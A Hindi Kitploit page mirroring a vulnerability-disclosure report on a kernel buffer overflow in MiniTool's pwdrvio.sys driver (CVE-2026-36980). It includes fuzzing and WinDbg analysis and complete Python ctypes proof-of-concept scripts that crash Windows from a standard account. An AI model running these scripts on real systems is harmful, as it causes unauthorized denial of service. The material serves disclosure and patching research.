Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-36980-Kernel-BSOD-DoS-PoC — प्रोजेक्ट दिनांक: फ़रवरी 2026 / कर्नेल ड्राइवर के IOCTL हैंडलर में बफर ओवरफ्लो भेद्यता की खोज की गई। यह भेद्यता बिना विशेषाधिकार वाले स्थानीय हमलावर को कर्नेल पूल मेमोरी को दूषित करने की अनुमति देती है, जिससे तत्काल सिस्टम क्रैश (BSOD) और सेवा अस्वीकरण (Denial of Service) उत्पन्न होता है। | Kitploit
उपकरण/GitHubGitHub/canomer/cve-2026-36980-kernel-bsod-dos-poc
भेद्यता विश्लेषणशोषणडीबगर्सफज़िंगबाइनरी शोषण
GitHubcanomer/cve-2026-36980-kernel-bsod-dos-poc

CVE-2026-36980-Kernel-BSOD-DoS-PoC

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

प्रोजेक्ट दिनांक: फ़रवरी 2026 / कर्नेल ड्राइवर के IOCTL हैंडलर में बफर ओवरफ्लो भेद्यता की खोज की गई। यह भेद्यता बिना विशेषाधिकार वाले स्थानीय हमलावर को कर्नेल पूल मेमोरी को दूषित करने की अनुमति देती है, जिससे तत्काल सिस्टम क्रैश (BSOD) और सेवा अस्वीकरण (Denial of Service) उत्पन्न होता है।

13 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-36980-Kernel-BSOD-DoS-PoC

परियोजना तिथि : फ़रवरी 2026 / pwdrvio.sys कर्नेल ड्राइवर के IOCTL हैंडलर में एक बफर ओवरफ़्लो भेद्यता की खोज की गई। यह भेद्यता एक अनविशेषाधिकार प्राप्त स्थानीय हमलावर को कर्नेल पूल मेमोरी को दूषित करने की अनुमति देती है, जिससे तत्काल सिस्टम क्रैश (BSOD) और सेवा से इनकार होता है।

  • 2026-02-09 विक्रेता को सूचित किया गया
  • 2026-03-05 विक्रेता ने स्वीकार किया
  • 2026-03-05 MITRE से CVE अनुरोध किया गया
  • 2026-05-10 90-दिन की समन्वित प्रकटीकरण अवधि के बाद सार्वजनिक प्रकटीकरण

https://github.com/user-attachments/assets/b53fb5d1-b4d0-4bc6-ad6e-2a321a1d2101

सेवा से इनकार (DoS) गंभीरता: मध्यम (MEDIUM) CVSS 3.1 स्कोर: 5.5 (DoS)
CVSS वेक्टर स्ट्रिंग:

  • DoS: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

बफर ओवरफ़्लो — सेवा से इनकार (CVSS 5.5 - मध्यम)

  • ब्लू स्क्रीन ऑफ़ डेथ (BSOD) ट्रिगर करता है
  • स्टैंडअलोन शोषण (कोई डीबगर आवश्यक नहीं)
  • IOCTL 0x22000d के माध्यम से बफर ओवरफ़्लो के कारण
  • सभी परीक्षण किए गए कॉन्फ़िगरेशन में सुसंगत क्रैश

हमले की पूर्वापेक्षाएँ:

  • लक्षित सिस्टम तक स्थानीय पहुंच
  • मानक उपयोगकर्ता खाता (गैर-व्यवस्थापक)
  • MiniTool Partition Wizard स्थापित या अनइंस्टॉल किया हुआ (pwdrvio.sys ड्राइवर लोडेड)

शोषण परिणाम: DoS - तत्काल सिस्टम क्रैश, सेवा अनुपलब्धता

भेद्यता खोज की समयरेखा

चरण 1: प्रारंभिक फ़ज़िंग और BSOD खोज

दिनांक: 5 फ़रवरी 2026
गतिविधि: कस्टम Python फ़ज़र का उपयोग करके व्यवस्थित कर्नेल ड्राइवर फ़ज़िंग

खोज प्रक्रिया:

  1. लक्ष्य चयन:

    • Windows 10 VM पर स्थापित कर्नेल ड्राइवरों की गणना की गई
    • pwdrvio.sys को सबसे पुराना ड्राइवर पहचाना गया (टाइमस्टैम्प: 16 जून 2009)
    • ड्राइवर फ़ाइल: C:\Windows\System32\drivers\pwdrvio.sys
    • डिवाइस ऑब्जेक्ट: \\.\PartitionWizardDiskAccesser\0
  2. प्रारंभिक फ़ज़िंग:

    • ड्राइवर के साथ इंटरफ़ेस करने के लिए ctypes का उपयोग करके Python फ़ज़र विकसित किया गया
    • ड्राइवर डिवाइस पर WriteFile/DeviceIoControl के माध्यम से यादृच्छिक डेटा भेजा गया
    • परिणाम: कई ब्लू स्क्रीन ऑफ़ डेथ (BSOD)
  3. वेरिफ़ायर सक्रियण:

    • बेहतर क्रैश पहचान के लिए Driver Verifier सक्षम किया गया
    root@kitploit:~
    verifier /standard /driver pwdrvio.sys
    

    वेरिफ़ायर कॉन्फ़िगरेशन:

    root@kitploit:~
    Verifier Flags: 0x001209bb
    Standard Flags Enabled:
      [X] Special pool
      [X] Force IRQL checking  
      [X] Pool tracking
      [X] I/O verification
      [X] Deadlock detection
      [X] DMA checking
      [X] Security checks
      [X] Miscellaneous checks
      [X] DDI compliance checking
    

चरण 2: WinDbg कर्नेल डीबगिंग सेटअप

दिनांक: 5-6 फ़रवरी 2026
गतिविधि: मूल कारण विश्लेषण के लिए कर्नेल डीबगिंग वातावरण स्थापित किया गया

सेटअप प्रक्रिया:

  1. VMware सीरियल पोर्ट कॉन्फ़िगरेशन:

    root@kitploit:~
    VMware Workstation Pro → VM Settings
    ├─ Add Hardware → Serial Port
    ├─ Connection: "Use named pipe"
    ├─ Path: \\.\pipe\com_1
    ├─ End: "This is the server"
    └─ I/O Mode: "Yield CPU on poll" ✓
    
  2. अतिथि OS कॉन्फ़िगरेशन:

    root@kitploit:~
    REM Administrator Command Prompt
    bcdedit /debug on
    bcdedit /dbgsettings serial debugport:1 baudrate:115200
    shutdown /r /t 0
    
  3. होस्ट WinDbg कनेक्शन:

    root@kitploit:~
    WinDbg → File → Attach to Kernel
    ├─ Port: \\.\pipe\com_1
    ├─ Baud Rate: 115200
    ├─ Pipe: ✓
    └─ Reconnect: ✓
    
    Result: "Kernel Debugger connection established."
    

चरण 3: मूल कारण विश्लेषण - आर्बिट्रेरी राइट खोज

दिनांक: 6 फ़रवरी 2026
गतिविधि: आर्बिट्रेरी कर्नेल राइट प्रिमिटिव की पहचान की गई

विश्लेषण चरण:

  1. मॉड्यूल विश्लेषण:

    root@kitploit:~
    1: kd> lm m pwdrvio
    start             end                 module name
    fffff805`315f0000 fffff805`315f8000   pwdrvio  (Jun 16 2009)
    
    1: kd> !drvobj pwdrvio 2
    Driver object (fffff805`XXXXXXXX) is for:
     \Driver\pwdrvio
    
    DriverEntry:   fffff805`315f6008
    DriverUnload:  fffff805`315f1060
    
    Dispatch Routines:
    [00] IRP_MJ_CREATE                      fffff805`315f108c
    [02] IRP_MJ_CLOSE                       fffff805`315f12f8
    [03] IRP_MJ_READ                        fffff805`315f16c4
    [04] IRP_MJ_WRITE                       fffff805`315f1564  ← Target
    [0e] IRP_MJ_DEVICE_CONTROL              fffff805`315f1404
    
  2. भेद्य निर्देश खोज:

    राइट हैंडलर पर ब्रेकपॉइंट सेट करें:

    root@kitploit:~
    1: kd> bp pwdrvio+0x1641
    1: kd> g
    
    Breakpoint 0 hit
    pwdrvio+0x1641:
    fffff805`315f1641 498943f0        mov qword ptr [r11-10h],rax
    

    महत्वपूर्ण निष्कर्ष: आर्बिट्रेरी राइट प्रिमिटिव की पहचान की गई!

    • निर्देश कर्नेल पॉइंटर (RAX) को पते [R11-0x10] पर लिखता है
    • R11 स्टैक फ्रेम से लोड होता है: mov r11, qword ptr [rbp+0xB8h]
    • गंतव्य पते पर कोई सत्यापन नहीं किया जाता

चरण 4: UAF से आर्बिट्रेरी राइट विश्लेषण

दिनांक: 6-7 फ़रवरी 2026
गतिविधि: User-After-Free से write-what-where स्थिति तक भेद्यता का पता लगाया गया

मेमोरी भ्रष्टाचार श्रृंखला:

  1. IRP आवंटन:

    root@kitploit:~
    0: kd> !pool @rbp
    Pool page ffffe60f84c38610 region is Special pool
    *ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+
    Pooltag Irp+ : I/O verifier allocated IRP packets
    
  2. बफर संबंध:

    root@kitploit:~
    0: kd> r rsi
    rsi=ffffe60f828df900  ← User buffer location
    
    0: kd> ? @rbp - @rsi
    Evaluate expression: 35823344 = 00000000`02229ef0  ← 35MB difference!
    

    विश्लेषण: उपयोगकर्ता बफर RBP फ्रेम से सीधे सुलभ नहीं है

    • RBP कर्नेल पूल में IRP संरचना की ओर इंगित करता है
    • उपयोगकर्ता बफर एक अलग मेमोरी क्षेत्र में है
    • RBP+0xB8 ऑफसेट उपयोगकर्ता-नियंत्रित बफर की ओर इंगित नहीं करता
  3. Use-After-Free स्थिति:

    ड्राइवर IRP संरचना में डैंगलिंग पॉइंटर बनाए रखता है:

    root@kitploit:~
    // Ghidra decompilation (pwdrvio+0x1564)
    longlong lVar1 = *(longlong *)(param_2 + 0xb8);  // Load from IRP
    
    // No validation!
    lVar5 = IoBuildAsynchronousFsdRequest(...);
    
    // Write to [lVar1 - 0x10]
    *(code **)(lVar3 + -0x10) = FUN_00011364;  // Arbitrary write!
    

चरण 6: सेवा से इनकार (DoS) की पहचान

दिनांक: 8 फ़रवरी 2026
गतिविधि: स्टैंडअलोन DoS भेद्यता की खोज की गई

खोज:

  1. IOCTL फ़ज़िंग:

    • दोषपूर्ण बफर के साथ विभिन्न IOCTL कोड का परीक्षण किया गया
    • IOCTL 0x22000d को भेद्य के रूप में पहचाना गया
  2. क्रैश तंत्र:

    root@kitploit:~
    # Vulnerable parameters
    TARGET_IOCTL = 0x22000d
    
    input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
    real_output_buffer = ctypes.create_string_buffer(4)
    fake_output_length = 8192  # Driver trusts this value!
    
    DeviceIoControl(handle, TARGET_IOCTL, input_buf, 1024,
                    real_output_buffer, fake_output_length, ...)
    
  3. ड्राइवर व्यवहार:

    • ड्राइवर उपयोगकर्ता-आपूर्ति आउटपुट बफर लंबाई पर भरोसा करता है
    • 4-बाइट बफर में 8192 बाइट्स लिखने का प्रयास करता है
    • बफर ओवरफ़्लो → पूल भ्रष्टाचार → BSOD

वेरिफ़ायर आउटपुट:

root@kitploit:~
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
Arg1: 0000000000000091, Corrupted pool allocation
Arg2: fffff805315f1404, Driver code address
Arg3: ffffe60f84c38000, Pool allocation address
Arg4: 0000000000000091, Corruption type

PROCESS_NAME: python.exe

भेद्यता #2: सेवा से इनकार (DoS)

CWE वर्गीकरण

  • CWE-120: इनपुट के आकार की जाँच किए बिना बफर कॉपी
  • CWE-119: मेमोरी बफर के भीतर संचालन का अनुचित प्रतिबंध
  • CWE-248: अनकॉट अपवाद

भेद्यता विवरण

स्थान: pwdrvio.sys IOCTL हैंडलर
भेद्य IOCTL: 0x22000d

ट्रिगर तंत्र:

root@kitploit:~
import ctypes
from ctypes import wintypes

DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
TARGET_IOCTL = 0x22000d

kernel32 = ctypes.windll.kernel32

# Open driver
handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)

# Malicious parameters
input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
real_output_buffer = ctypes.create_string_buffer(4)  # Only 4 bytes!
fake_output_length = 8192  # Claim 8192 bytes!
bytes_returned = wintypes.DWORD(0)

# Trigger overflow
kernel32.DeviceIoControl(handle, TARGET_IOCTL, 
                         input_buf, 1024,
                         real_output_buffer, fake_output_length,  # ← Overflow!
                         ctypes.byref(bytes_returned), None)

क्रैश व्यवहार:

Driver Verifier सक्षम होने पर:

root@kitploit:~
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)
Arguments:
Arg1: 0000000000000091 - Corrupted pool allocation detected
Arg2: fffff805315f1404 - Driver code address (IOCTL handler)
Arg3: ffffe60f84c38000 - Pool allocation address
Arg4: 0000000000000091 - Special pool pattern corrupted

Analysis:
- Driver attempts to write 8192 bytes to 4-byte buffer
- Pool header corruption detected by verifier
- Immediate bugcheck (BSOD)

Process triggering crash: python.exe (standard user)

Driver Verifier के बिना:

root@kitploit:~
SYSTEM_SERVICE_EXCEPTION (3b)
Arguments:
Arg1: 00000000c0000005 - Access violation
Arg2: fffff805315f1404 - Faulting address in pwdrvio.sys
Arg3: ffffXXXXXXXXXXXX - Trap frame
Arg4: 0000000000000000

Result: Blue Screen of Death

पूर्ण कोड और शोषण

कोड:

root@kitploit:~
import ctypes
from ctypes import wintypes

# --- Settings ---
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
kernel32 = ctypes.windll.kernel32

# --- Defines ---
# Windows API Defines
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD, 
                                 wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD, wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE

kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD, 
                                     wintypes.LPVOID, wintypes.DWORD, ctypes.POINTER(wintypes.DWORD), wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL

def trigger_bsod():
    print("[!] MiniTool DoS...")
    
    # 1. Connect Driver
    handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
    
    if handle == wintypes.HANDLE(-1).value or handle is None:
        print("[-] Couldnt Connect.")
        return

    # 2. Preperation
    # IOCTL from Fuzzer
    TARGET_IOCTL = 0x22000d 
    
    # Input: Fiiled 0xFF - 1024 byte (Pointer Poisoning)
    in_size = 1024
    input_buf = (ctypes.c_char * in_size)(*([0xFF] * in_size))
    
    # Output Trap: Standard 4 byte, 8192 byte in Driver
    real_output_buffer = ctypes.create_string_buffer(4)
    fake_output_length = 8192 
    bytes_returned = wintypes.DWORD(0)

    print("[+] Wait for BSoD...")

    # 3. Loop (Pool Corruption)
    while True:
        kernel32.DeviceIoControl(
            handle, 
            TARGET_IOCTL, 
            input_buf, 
            in_size, 
            real_output_buffer, 
            fake_output_length, # <--- Vulnerable Point: Driver BufferOverflow
            ctypes.byref(bytes_returned), 
            None
        )

if __name__ == "__main__":
    trigger_bsod()

शोषण:

root@kitploit:~
PS C:\Users\standarduser\directory> & "C:\Program Files\Python314\python.exe" .\DoS_PoC.py

प्रूफ़ ऑफ़ कॉन्सेप्ट और पुनरुत्पादन चरण

पूर्वापेक्षाएँ

परीक्षण वातावरण:

  • ऑपरेटिंग सिस्टम: Windows 10 Home Build 19045.6466
  • आर्किटेक्चर: x64
  • MiniTool संस्करण: Partition Wizard 13.5
  • ड्राइवर: pwdrvio.sys (दिनांक 16 जून 2009)
  • उपयोगकर्ता खाता: मानक उपयोगकर्ता (गैर-व्यवस्थापक)

आवश्यक उपकरण:

  • LPE के लिए: WinDbg (Windows डीबगर), VMware Workstation
  • DoS के लिए: ctypes के साथ Python 3.x

पुनरुत्पादन #1: सेवा से इनकार (स्टैंडअलोन)

चरण 1: ड्राइवर स्थापना सत्यापित करें

root@kitploit:~
C:\> sc query pwdrvio

SERVICE_NAME: pwdrvio
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)

चरण 2: Driver Verifier सक्षम करें (वैकल्पिक लेकिन अनुशंसित)

root@kitploit:~
REM Administrator Command Prompt
C:\> verifier /standard /driver pwdrvio.sys

REM Verify configuration
C:\> verifier /query

Verifier Flags: 0x001209bb
  Standard Flags:
    [X] 0x00000001 Special pool
    [X] 0x00000002 Force IRQL checking
    [X] 0x00000008 Pool tracking
    [X] 0x00000010 I/O verification
    [X] 0x00000020 Deadlock detection
    [X] 0x00000080 DMA checking
    [X] 0x00000100 Security checks
    [X] 0x00000800 Miscellaneous checks
    [X] 0x00020000 DDI compliance checking

  Driver Verification List:
    MODULE: pwdrvio.sys (load: 1 / unload: 0)

REM Reboot for verifier to take effect
C:\> shutdown /r /t 0

चरण 3: DoS शोषण स्क्रिप्ट बनाएँ

इसे dos_exploit.py के रूप में सहेजें:

root@kitploit:~
import ctypes
from ctypes import wintypes

# Device path
DEVICE_NAME = r"\\.\PartitionWizardDiskAccesser\0"
kernel32 = ctypes.windll.kernel32

# Windows API definitions
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD, 
                                 wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD, 
                                 wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE

kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID, 
                                     wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD, 
                                     ctypes.POINTER(wintypes.DWORD), wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL

def trigger_bsod():
    print("[*] MiniTool pwdrvio.sys DoS Exploit")
    print("[*] Triggering Blue Screen of Death...")
    
    # Open device
    handle = kernel32.CreateFileW(DEVICE_NAME, 0xC0000000, 3, None, 3, 0, None)
    
    if handle == wintypes.HANDLE(-1).value or handle is None:
        print("[-] Failed to open driver")
        print("[-] Ensure MiniTool Partition Wizard is installed")
        return
    
    print("[+] Driver opened successfully")
    
    # Vulnerable IOCTL code
    TARGET_IOCTL = 0x22000d
    
    # Input buffer: 1024 bytes of 0xFF
    input_buf = (ctypes.c_char * 1024)(*([0xFF] * 1024))
    
    # Output buffer: Only 4 bytes (but claim 8192!)
    real_output_buffer = ctypes.create_string_buffer(4)
    fake_output_length = 8192  # Driver trusts this value → Overflow!
    bytes_returned = wintypes.DWORD(0)
    
    print("[!] Sending malicious IOCTL...")
    print("[!] System will crash in 3...2...1...")
    
    # Trigger buffer overflow → BSOD
    kernel32.DeviceIoControl(
        handle, 
        TARGET_IOCTL, 
        input_buf, 
        1024, 
        real_output_buffer, 
        fake_output_length,  # ← Vulnerability trigger
        ctypes.byref(bytes_returned), 
        None
    )
    
    # This line will never execute
    print("[*] If you see this, the exploit failed")

if __name__ == "__main__":
    trigger_bsod()

चरण 4: शोषण निष्पादित करें (मानक उपयोगकर्ता)

root@kitploit:~
C:\> whoami
desktop-lfkkhu2\standard_user

C:\> python dos_exploit.py
[*] MiniTool pwdrvio.sys DoS Exploit
[*] Triggering Blue Screen of Death...
[+] Driver opened successfully
[!] Sending malicious IOCTL...
[!] System will crash in 3...2...1...

[System immediately crashes with BSOD]

अपेक्षित परिणाम:

स्टॉप कोड के साथ ब्लू स्क्रीन:

root@kitploit:~
DRIVER_VERIFIER_DETECTED_VIOLATION (c4)

या

root@kitploit:~
SYSTEM_SERVICE_EXCEPTION (3b)

सत्यापन: सिस्टम क्रैश DoS भेद्यता की पुष्टि करता है

MiniTool सॉफ़्टवेयर:

root@kitploit:~
Product:               MiniTool Partition Wizard
Version:               13.5
Installation Path:     C:\Program Files\MiniTool Partition Wizard
Driver Path:           C:\Windows\System32\drivers\pwdrvio.sys
Driver Date:           June 16, 2009 (0x4A36F8D1)
Driver Size:           32,256 bytes

परीक्षण उपकरण:

root@kitploit:~
WinDbg Version:        10.0.29507.1001 AMD64
Python Version:        3.x with ctypes
Compiler:              x86_64-w64-mingw32-gcc (MinGW)
Verifier:              Windows Driver Verifier (Standard flags)

प्रभावित संस्करण

पुष्टि किए गए भेद्य संस्करण

प्राथमिक उत्पाद:

  • MiniTool Partition Wizard 13.5
  • pwdrvio.sys का उपयोग करने वाले सभी पिछले संस्करण

ड्राइवर विवरण:

root@kitploit:~
File Name:          pwdrvio.sys
File Version:       [Not available]
File Size:          32,256 bytes (31.5 KB)
Time Stamp:         0x4A36F8D1 (June 16, 2009, 04:43:45 UTC)
Digital Signature:  [Signed by vendor]
Device Name:        \\.\PartitionWizardDiskAccesser\0
Service Name:       pwdrvio
Load Order:         Boot Start (SERVICE_BOOT_START)

संभावित रूप से प्रभावित

अन्य MiniTool उत्पाद जो समान ड्राइवर का उपयोग कर सकते हैं:

  • MiniTool Power Data Recovery
  • MiniTool Partition Wizard Bootable Edition
  • MiniTool ShadowMaker

नोट: पुष्टि के लिए प्रत्येक उत्पाद का व्यक्तिगत रूप से परीक्षण किया जाना चाहिए।

ऑपरेटिंग सिस्टम संगतता

परीक्षण किए गए और पुष्टि किए गए भेद्य:

  • Windows 10 Home Build 19045.6466 (x64)

संभावित रूप से भेद्य (अपरीक्षित):

  • Windows 7 (x64)
  • Windows 8 / 8.1 (x64)
  • Windows 10 (सभी बिल्ड, x64)
  • Windows 11 (x64)
  • Windows Server 2008 R2 और बाद के संस्करण

कारण: ड्राइवर सभी आधुनिक Windows संस्करणों के साथ संगत है और इसमें कोई संस्करण-विशिष्ट जाँच शामिल नहीं है।

कानूनी अस्वीकरण

यह रिपॉजिटरी विशेष रूप से नियंत्रित प्रयोगशाला वातावरण में शैक्षिक, रक्षात्मक सुरक्षा अनुसंधान और भेद्यता पुनरुत्पादन उद्देश्यों के लिए प्रदान की गई है। जानकारी और प्रूफ़-ऑफ़-कॉन्सेप्ट कोड रक्षकों, शोधकर्ताओं और विक्रेताओं को रिपोर्ट की गई भेद्यता को समझने और ठीक करने में मदद करने के लिए है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध इस कोड का अनधिकृत या दुर्भावनापूर्ण उपयोग लागू कानूनों और विनियमों का उल्लंघन कर सकता है। लेखक अवैध गतिविधि को प्रोत्साहित या समर्थन नहीं करता है और इस सामग्री के दुरुपयोग या क्षति के लिए कोई दायित्व नहीं लेता है।

यह भेद्यता प्रकटीकरण रिपोर्ट निम्नलिखित के लिए प्रदान की गई है:

  1. सुरक्षा अनुसंधान और शिक्षा
  2. विक्रेता सूचना और पैच विकास
  3. अंतिम उपयोगकर्ताओं की सुरक्षा
  4. शैक्षणिक और रक्षात्मक सुरक्षा उद्देश्य

निषिद्ध उपयोग:

  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच
  • दुर्भावनापूर्ण शोषण
  • कोई भी अवैध गतिविधि

शोधकर्ता ने सभी परीक्षण नियंत्रित वातावरण में व्यक्तिगत रूप से स्वामित्व वाले सिस्टम पर किए। तृतीय-पक्ष सिस्टम तक कोई अनधिकृत पहुंच नहीं की गई।

रिपोर्ट संस्करण: 1.0
अंतिम अद्यतन: 9 फ़रवरी 2026

टूल डाउनलोड करें
  • रजिस्टर स्थिति विश्लेषण:

    root@kitploit:~
    0: kd> r
    rax=fffff805315f1364  ← Kernel code pointer
    r11=ffffe60f84c38750  ← Destination address (controlled via stack)
    rbp=ffffe60f84c38610  ← IRP stack frame
    
    0: kd> dq @rbp+0xB8 L1
    ffffe60f`84c386c8  ffffe60f`84c38750  ← R11 loaded from here